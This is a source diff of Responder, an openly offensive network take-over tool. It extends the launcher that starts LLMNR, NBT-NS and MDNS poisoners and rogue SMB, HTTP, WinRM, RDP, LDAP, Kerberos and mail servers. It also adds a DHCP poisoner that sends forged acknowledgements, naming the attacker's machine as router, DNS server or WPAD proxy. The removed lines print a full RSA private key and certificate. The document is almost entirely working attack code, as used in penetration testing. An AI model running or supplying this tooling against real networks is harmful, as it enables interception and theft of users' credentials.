+		    from poisoners.LLMNR import LLMNR
+		    threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
 
+		if settings.Config.NBTNS_On_Off:
+		    from poisoners.NBTNS import NBTNS
+		    threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137,  NBTNS,)))
+
+		if settings.Config.MDNS_On_Off:
+		    from poisoners.MDNS import MDNS
+		    threads.append(Thread(target=serve_MDNS_poisoner,  args=('', 5353, MDNS,)))
+
+		#// Vintage Responder BOWSER module, now disabled by default. 
+		#// Generate to much noise & easily detectable on the network when in analyze mode.
 		# Load Browser Listener
-		from servers.Browser import Browser
-		threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138,  Browser,)))
+		#from servers.Browser import Browser
+		#threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138,  Browser,)))
 
 		if settings.Config.HTTP_On_Off:
 			from servers.HTTP import HTTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 80, HTTP,)))
+
+		if settings.Config.WinRM_On_Off:
+			from servers.WinRM import WinRM
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 5985, WinRM,)))
+
+		if settings.Config.WinRM_On_Off:
+			from servers.WinRM import WinRM
+			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 5986, WinRM,)))
 
 		if settings.Config.SSL_On_Off:
-			from servers.HTTP import HTTPS
-			threads.append(Thread(target=serve_thread_SSL, args=('', 443, HTTPS,)))
+			from servers.HTTP import HTTP
+			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 443, HTTP,)))
+
+		if settings.Config.RDP_On_Off:
+			from servers.RDP import RDP
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3389, RDP,)))
+
+		if settings.Config.DCERPC_On_Off:
+			from servers.RPC import RPCMap, RPCMapper
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 135, RPCMap,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, settings.Config.RPCPort, RPCMapper,)))
 
 		if settings.Config.WPAD_On_Off:
 			from servers.HTTP_Proxy import HTTP_Proxy
-			threads.append(Thread(target=serve_thread_tcp, args=('', 3141, HTTP_Proxy,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3128, HTTP_Proxy,)))
 
 		if settings.Config.ProxyAuth_On_Off:
 		        from servers.Proxy_Auth import Proxy_Auth
-		        threads.append(Thread(target=serve_thread_tcp, args=('', 3128, Proxy_Auth,)))
+		        threads.append(Thread(target=serve_thread_tcp_auth, args=(settings.Config.Bind_To, 3128, Proxy_Auth,)))
 
 		if settings.Config.SMB_On_Off:
 			if settings.Config.LM_On_Off:
 				from servers.SMB import SMB1LM
-				threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1LM,)))
-				threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1LM,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1LM,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1LM,)))
 			else:
 				from servers.SMB import SMB1
-				threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1,)))
-				threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1,)))
+				threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1,)))
+
+		if settings.Config.QUIC_On_Off:
+			from servers.QUIC import start_quic_server
+			cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+			key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+			threads.append(Thread(target=lambda: asyncio.run(start_quic_server(settings.Config.Bind_To, cert, key))))
 
 		if settings.Config.Krb_On_Off:
 			from servers.Kerberos import KerbTCP, KerbUDP
 			threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,)))
-			threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 88, KerbTCP,)))
 
 		if settings.Config.SQL_On_Off:
-			from servers.MSSQL import MSSQL
-			threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,)))
+			from servers.MSSQL import MSSQL, MSSQLBrowser
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 1433, MSSQL,)))
+			threads.append(Thread(target=serve_thread_udp_broadcast, args=(settings.Config.Bind_To, 1434, MSSQLBrowser,)))
 
 		if settings.Config.FTP_On_Off:
 			from servers.FTP import FTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 21, FTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 21, FTP,)))
 
 		if settings.Config.POP_On_Off:
 			from servers.POP3 import POP3
-			threads.append(Thread(target=serve_thread_tcp, args=('', 110, POP3,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 110, POP3,)))
 
 		if settings.Config.LDAP_On_Off:
-			from servers.LDAP import LDAP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 389, LDAP,)))
+			from servers.LDAP import LDAP, CLDAP
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 389, LDAP,)))
+			threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 636, LDAP,)))
+			threads.append(Thread(target=serve_thread_udp, args=('', 389, CLDAP,)))
+
+		if settings.Config.MQTT_On_Off:
+			from servers.MQTT import MQTT
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 1883, MQTT,)))
 
 		if settings.Config.SMTP_On_Off:
 			from servers.SMTP import ESMTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 25,  ESMTP,)))
-			threads.append(Thread(target=serve_thread_tcp, args=('', 587, ESMTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 25,  ESMTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 587, ESMTP,)))
 
 		if settings.Config.IMAP_On_Off:
 			from servers.IMAP import IMAP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 143, IMAP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 143, IMAP,)))
+			from servers.IMAP import IMAPS
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 993, IMAPS,)))
+
 
 		if settings.Config.DNS_On_Off:
 			from servers.DNS import DNS, DNSTCP
 			threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,)))
 			threads.append(Thread(target=serve_thread_tcp, args=('', 53, DNSTCP,)))
 
+		if settings.Config.SNMP_On_Off:
+			from servers.SNMP import SNMP
+			threads.append(Thread(target=serve_thread_udp, args=('', 161, SNMP,)))
+
 		for thread in threads:
-			thread.setDaemon(True)
+			thread.daemon = True
 			thread.start()
 
-		print color('[+]', 2, 1) + " Listening for events..."
+		if settings.Config.AnalyzeMode:
+			print(color('[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1))
+		if settings.Config.Quiet_Mode:
+			print(color('[+] Responder is in quiet mode. No NBT-NS, LLMNR, MDNS messages will print to screen.', 3, 1))
+			
+
+		if settings.Config.DHCP_On_Off:
+			from poisoners.DHCP import DHCP
+			DHCP(settings.Config.DHCP_DNS)
 
 		while True:
 			time.sleep(1)
 
 	except KeyboardInterrupt:
+		# Optional: Print DHCPv6 statistics on shutdown
+		if settings.Config.DHCPv6_On_Off:
+			try:
+				from servers.DHCPv6 import print_dhcpv6_stats
+				print_dhcpv6_stats()
+			except:
+				raise
+				pass
 		sys.exit("\r%s Exiting..." % color('[+]', 2, 1))
 
 if __name__ == '__main__':

certs/gen-self-signed-cert.sh

@@ -1,3 +1,3 @@
 #!/bin/bash
-openssl genrsa -out responder.key 2048
-openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/"
+openssl genrsa -out certs/responder.key 2048
+openssl req -new -x509 -days 3650 -key certs/responder.key -out certs/responder.crt -subj "/"

certs/responder.crt

@@ -1,18 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw
-NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
-AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
-sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
-2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
-6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
-WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
-N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU
-YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm
-6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0
-YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8
-koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335
-4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw
-YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW
-HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v
-u0/CRCN/lg==
------END CERTIFICATE-----

certs/responder.key

@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
-sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
-2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
-6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
-WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
-N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABAoIBABuAkDTUj0nZpFLS
-1RLvqoeamlcFsQ+QzyRkxzNYEimF1rp4rXiYJuuOmtULleogm+dpQsA9klaQyEwY
-kowTqG3ZO8kTFwIr9nOqiXENDX3FOGnchwwfaOz0XlNhncFm3e7MKA25T4UeI02U
-YBPS75NspHb3ltsVnqhYSYyv3w/Ml/mDz+D76dRgT6seLEOTkKwZj7icBR6GNO1R
-FLbffJNE6ZcXI0O892CTVUB4d3egcpSDuaAq3f/UoRB3xH7MlnEPfxE3y34wcp8i
-erqm/8uVeBOnQMG9FVGXBJXbjSjnWS27sj/vGm+0rc8c925Ed1QdIM4Cvk6rMOHQ
-IGkDnvECgYEA4e3B6wFtONysLhkG6Wf9lDHog35vE/Ymc695gwksK07brxPF1NRS
-nNr3G918q+CE/0tBHqyl1i8SQ/f3Ejo7eLsfpAGwR9kbD9hw2ViYvEio9dAIMVTL
-LzJoSDLwcPCtEOpasl0xzyXrTBzWuNYTlfvGkyd2mutynORRIZPhgHkCgYEA00Q9
-cHBkoBOIHF8XHV3pm0qfwuE13BjKSwKIrNyKssGf8sY6bFGhLSpTLjWEMN/7B+S1
-5IC0apiGjHNK6Z51kjKhEmSzCg8rXyULOalsyo2hNsMA+Lt1g72zJIDIT/+YeKAf
-s85G6VgMtNLozNjx7C1eMugECJ+rrpRVpIe1kJcCgYAr+I0cQtvSDEjKc/5/YMje
-ldQN+4Z82RRkwYshsKBTEXb6HRwMrwIhGxCq8LF59imMUkYrRSjFhcXFSrZgasr2
-VVz0G4wGf7+flt1nv7GCO5X+uW1OxJUC64mWO6vGH2FfgG0Ed9Tg3x1rY9V6hdes
-AiOEslKIFjjpRhpwMYra6QKBgQDLFO/SY9f2oI/YZff8PMhQhL1qQb7aYeIjlL35
-HM8e4k10u+RxN06t8d+frcXyjXvrrIjErIvBY/kCjdlXFQGDlbOL0MziQI66mQtf
-VGPFmbt8vpryfpCKIRJRZpInhFT2r0WKPCGiMQeV0qACOhDjrQC+ApXODF6mJOTm
-kaWQ5QKBgHE0pD2GAZwqlvKCM5YmBvDpebaBNwpvoY22e2jzyuQF6cmw85eAtp35
-f92PeuiYyaXuLgL2BR4HSYSjwggxh31JJnRccIxSamATrGOiWnIttDsCB5/WibOp
-MKuFj26d01imFixufclvZfJxbAvVy4H9hmyjgtycNY+Gp5/CLgDC
------END RSA PRIVATE KEY-----

fingerprint.py

@@ -1,62 +0,0 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import socket
-import struct
-
-from utils import color
-from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData
-
-def OsNameClientVersion(data):
-	try:
-		length = struct.unpack('<H',data[43:45])[0]
-		pack = tuple(data[47+length:].split('\x00\x00\x00'))[:2]
-		OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
-		return OsVersion, ClientVersion
-	except:
-	 	return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
-
-def RunSmbFinger(host):
-	try:
-		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-		s.connect(host)
-		s.settimeout(0.7)
-
-		h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
-		n = SMBNego(data = SMBNegoFingerData())
-		n.calculate()
-		
-		Packet = str(h)+str(n)
-		Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-		s.send(Buffer)
-		data = s.recv(2048)
-		
-		if data[8:10] == "\x72\x00":
-			Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
-			Body = SMBSessionFingerData()
-			Body.calculate()
-
-			Packet = str(Header)+str(Body)
-			Buffer = struct.pack(">i", len(''.join(Packet)))+Packet  
-
-			s.send(Buffer) 
-			data = s.recv(2048)
-
-		if data[8:10] == "\x73\x16":
-			return OsNameClientVersion(data)
-	except:
-		print color("[!] ", 1, 1) +" Fingerprint failed"
-		return None

odict.py

@@ -1,20 +1,12 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from UserDict import DictMixin
+import sys
+try:
+    from UserDict import DictMixin
+except ImportError:
+    from collections import UserDict
+    try:
+        from collections import MutableMapping as DictMixin
+    except ImportError:
+        from collections.abc import MutableMapping as DictMixin
 
 class OrderedDict(dict, DictMixin):
 
@@ -30,7 +22,7 @@ class OrderedDict(dict, DictMixin):
     def clear(self):
         self.__end = end = []
         end += [None, end, end]
-        self.__map = {}
+        self.__map = {} 
         dict.clear(self)
 
     def __setitem__(self, key, value):
@@ -77,20 +69,30 @@ class OrderedDict(dict, DictMixin):
         inst_dict = vars(self).copy()
         self.__map, self.__end = tmp
         if inst_dict:
-            return self.__class__, (items,), inst_dict
+            return (self.__class__, (items,), inst_dict)
         return self.__class__, (items,)
 
     def keys(self):
         return list(self)
 
-    setdefault = DictMixin.setdefault
-    update = DictMixin.update
-    pop = DictMixin.pop
-    values = DictMixin.values
-    items = DictMixin.items
-    iterkeys = DictMixin.iterkeys
-    itervalues = DictMixin.itervalues
-    iteritems = DictMixin.iteritems
+    if sys.version_info >= (3, 0):
+        setdefault = DictMixin.setdefault
+        update = DictMixin.update
+        pop = DictMixin.pop
+        values = DictMixin.values
+        items = DictMixin.items
+        iterkeys = DictMixin.keys
+        itervalues = DictMixin.values
+        iteritems = DictMixin.items
+    else:
+        setdefault = DictMixin.setdefault
+        update = DictMixin.update
+        pop = DictMixin.pop
+        values = DictMixin.values
+        items = DictMixin.items
+        iterkeys = DictMixin.iterkeys
+        itervalues = DictMixin.itervalues
+        iteritems = DictMixin.iteritems
 
     def __repr__(self):
         if not self:
@@ -115,3 +117,8 @@ class OrderedDict(dict, DictMixin):
 
     def __ne__(self, other):
         return not self == other
+
+
+if __name__ == '__main__':
+    d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)])
+    assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh']

poisoners/DHCP.py

@@ -0,0 +1,354 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sys
+if (sys.version_info < (3, 0)):
+   sys.exit('This script is meant to be run with Python3')
+
+import struct
+import random
+import optparse
+import configparser
+import os
+import codecs
+import netifaces
+import binascii
+
+BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
+sys.path.insert(0, BASEDIR)
+from odict import OrderedDict
+from utils import *
+
+def color(txt, code = 1, modifier = 0):
+    return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+
+#Python version
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
+
+def StructWithLenPython2or3(endian,data):
+    #Python2...
+    if PY2OR3 == "PY2":
+        return struct.pack(endian, data)
+    #Python3...
+    else:
+        return struct.pack(endian, data).decode('latin-1')
+
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return str(data.decode('latin-1'))
+
+class Packet():
+	fields = OrderedDict([
+		("data", ""),
+	])
+	def __init__(self, **kw):
+		self.fields = OrderedDict(self.__class__.fields)
+		for k,v in kw.items():
+			if callable(v):
+				self.fields[k] = v(self.fields[k])
+			else:
+				self.fields[k] = v
+	def __str__(self):
+		return "".join(map(str, self.fields.values()))
+
+config = configparser.ConfigParser()
+config.read(os.path.join(BASEDIR,'Responder.conf'))
+RespondTo           = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')] if _f]
+DontRespondTo       = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')] if _f]
+Interface           = settings.Config.Interface
+Responder_IP        = RespondWithIP()
+ROUTERIP            = Responder_IP # Set to Responder_IP in case we fall on a static IP network and we don't get a DHCP Offer. This var will be updated with the real dhcp IP if present.
+NETMASK             = "255.255.255.0"
+DNSIP               = "0.0.0.0"
+DNSIP2              = "0.0.0.0"
+DNSNAME             = "local"
+WPADSRV             = "http://"+Responder_IP+"/wpad.dat"
+Respond_To_Requests = True
+DHCPClient          = []
+
+def GetMacAddress(Interface):
+	try:
+		mac = netifaces.ifaddresses(Interface)[netifaces.AF_LINK][0]['addr']
+		return binascii.unhexlify(mac.replace(':', '')).decode('latin-1')
+	except:
+		mac = "00:00:00:00:00:00"
+		return binascii.unhexlify(mac.replace(':', '')).decode('latin-1')
+		
+##### IP Header #####
+class IPHead(Packet):
+    fields = OrderedDict([
+            ("Version",           "\x45"),
+            ("DiffServices",      "\x00"),
+            ("TotalLen",          "\x00\x00"),
+            ("Ident",             "\x00\x00"),
+            ("Flags",             "\x00\x00"),
+            ("TTL",               "\x40"),
+            ("Protocol",          "\x11"),
+            ("Checksum",          "\x00\x00"),
+            ("SrcIP",             ""),
+            ("DstIP",             ""),
+    ])
+
+class UDP(Packet):
+    fields = OrderedDict([
+            ("SrcPort",           "\x00\x43"),
+            ("DstPort",           "\x00\x44"),
+            ("Len",               "\x00\x00"),
+            ("Checksum",          "\x00\x00"),
+            ("Data",              "\x00\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["Len"] = StructWithLenPython2or3(">h",len(str(self.fields["Data"]))+8)
+
+class DHCPDiscover(Packet):
+    fields = OrderedDict([
+            ("MessType",          "\x01"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               os.urandom(4).decode('latin-1')),
+            ("ElapsedSec",        "\x00\x01"),
+            ("BootpFlags",        "\x80\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         os.urandom(6).decode('latin-1')),#Needs to be random.
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("DHCPCode",          "\x35"),              #DHCP Message
+            ("DHCPCodeLen",       "\x01"),
+            ("DHCPOpCode",        "\x01"),              #Msgtype(Discover)
+            ("Op55",              "\x37"),
+            ("Op55Len",           "\x0b"),
+            ("Op55Str",           "\x01\x03\x0c\x0f\x06\x1a\x21\x79\x77\x2a\x78"),#Requested info.
+            ("Op12",              "\x0c"),
+            ("Op12Len",           "\x09"),
+            ("Op12Str",           settings.Config.DHCPHostname),#random str.
+            ("Op255",             "\xff"),
+            ("Padding",           "\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["ClientMac"] = GetMacAddress(Interface)
+
+class DHCPACK(Packet):
+    fields = OrderedDict([
+            ("MessType",          "\x02"),
+            ("HdwType",           "\x01"),
+            ("HdwLen",            "\x06"),
+            ("Hops",              "\x00"),
+            ("Tid",               "\x11\x22\x33\x44"),
+            ("ElapsedSec",        "\x00\x00"),
+            ("BootpFlags",        "\x00\x00"),
+            ("ActualClientIP",    "\x00\x00\x00\x00"),
+            ("GiveClientIP",      "\x00\x00\x00\x00"),
+            ("NextServerIP",      "\x00\x00\x00\x00"),
+            ("RelayAgentIP",      "\x00\x00\x00\x00"),
+            ("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
+            ("ClientMacPadding",  "\x00" *10),
+            ("ServerHostname",    "\x00" * 64),
+            ("BootFileName",      "\x00" * 128),
+            ("MagicCookie",       "\x63\x82\x53\x63"),
+            ("DHCPCode",          "\x35"),              #DHCP Message
+            ("DHCPCodeLen",       "\x01"),
+            ("DHCPOpCode",        "\x05"),              #Msgtype(ACK)
+            ("Op54",              "\x36"),
+            ("Op54Len",           "\x04"),
+            ("Op54Str",           ""),                  #DHCP Server
+            ("Op51",              "\x33"),
+            ("Op51Len",           "\x04"),
+            ("Op51Str",           "\x00\x00\x00\x0a"),  #Lease time
+            ("Op1",               "\x01"),
+            ("Op1Len",            "\x04"),
+            ("Op1Str",            ""),                  #Netmask
+            ("Op15",              "\x0f"),
+            ("Op15Len",           "\x0e"),
+            ("Op15Str",           ""),                  #DNS Name
+            ("Op3",               "\x03"),
+            ("Op3Len",            "\x04"),
+            ("Op3Str",            ""),                  #Router
+            ("Op6",               "\x06"),
+            ("Op6Len",            "\x08"),
+            ("Op6Str",            ""),                  #DNS Servers
+            ("Op252",             ""),
+            ("Op252Len",          ""),
+            ("Op252Str",          ""),                  #Wpad Server
+            ("Op255",             "\xff"),
+            ("Padding",           "\x00"),
+    ])
+
+    def calculate(self, DHCP_DNS):
+        self.fields["Op54Str"]  = socket.inet_aton(ROUTERIP).decode('latin-1')
+        self.fields["Op1Str"]   = socket.inet_aton(NETMASK).decode('latin-1')
+        self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP).decode('latin-1')
+        self.fields["Op6Str"]   = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
+        self.fields["Op15Str"]  = DNSNAME
+        if DHCP_DNS:
+               self.fields["Op6Str"]   = socket.inet_aton(RespondWithIP()).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
+        else:
+               self.fields["Op252"]    = "\xfc"
+               self.fields["Op252Str"] = WPADSRV
+               self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"])))
+        
+        self.fields["Op51Str"]  = StructWithLenPython2or3('>L', random.randrange(10, 20))
+        self.fields["Op15Len"]  = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"])))
+
+def RespondToThisIP(ClientIp):
+    if ClientIp.startswith('127.0.0.'):
+        return False
+    elif RespondTo and ClientIp not in RespondTo:
+        return False
+    elif ClientIp in RespondTo or RespondTo == []:
+        if ClientIp not in DontRespondTo:
+            return True
+    return False
+
+def ParseSrcDSTAddr(data):
+    SrcIP = socket.inet_ntoa(data[0][26:30])
+    DstIP = socket.inet_ntoa(data[0][30:34])
+    SrcPort = struct.unpack('>H',data[0][34:36])[0]
+    DstPort = struct.unpack('>H',data[0][36:38])[0]
+    return SrcIP, SrcPort, DstIP, DstPort
+
+def FindIP(data):
+    IPPos = data.find(b"\x32\x04") + 2
+    if IPPos == -1 or IPPos + 4 >= len(data) or IPPos == 1:
+        #Probably not present in the DHCP options we received, let's grab it from the IP header instead
+        return data[12:16]
+    else:
+        IP = data[IPPos:IPPos+4]
+        return IP
+
+def ParseDHCPCode(data, ClientIP,DHCP_DNS):
+    global DHCPClient
+    global ROUTERIP
+    PTid        = data[4:8]
+    Seconds     = data[8:10]
+    CurrentIP   = socket.inet_ntoa(data[12:16])
+    RequestedIP = socket.inet_ntoa(data[16:20])
+    MacAddr     = data[28:34]
+    MacAddrStr  = ':'.join('%02x' % ord(m) for m in MacAddr.decode('latin-1')).upper()
+    OpCode      = data[242:243]
+    RequestIP   = data[245:249]
+    
+    if DHCPClient.count(MacAddrStr) >= 4:
+        return "'%s' has been poisoned more than 4 times. Ignoring..." % MacAddrStr
+
+    if OpCode == b"\x02" and Respond_To_Requests:  # DHCP Offer
+        ROUTERIP = ClientIP
+        return 'Found DHCP server IP: %s, now waiting for incoming requests...' % (ROUTERIP)
+
+    elif OpCode == b"\x03" and Respond_To_Requests:  # DHCP Request
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
+            if RespondToThisIP(IPConv):
+                IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate(DHCP_DNS)
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
+                DHCPClient.append(MacAddrStr)
+                SaveDHCPToDb({
+                              'MAC': MacAddrStr, 
+                              'IP': CurrentIP, 
+                              'RequestedIP': IPConv,
+                             })
+                return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
+                
+    # DHCP Inform
+    elif OpCode == b"\x08":
+        IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=socket.inet_aton(CurrentIP).decode('latin-1'))
+        Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), ActualClientIP=socket.inet_aton(CurrentIP).decode('latin-1'),
+                                                        GiveClientIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
+                                                        NextServerIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
+                                                        RelayAgentIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
+                                                        ElapsedSec=Seconds.decode('latin-1'))
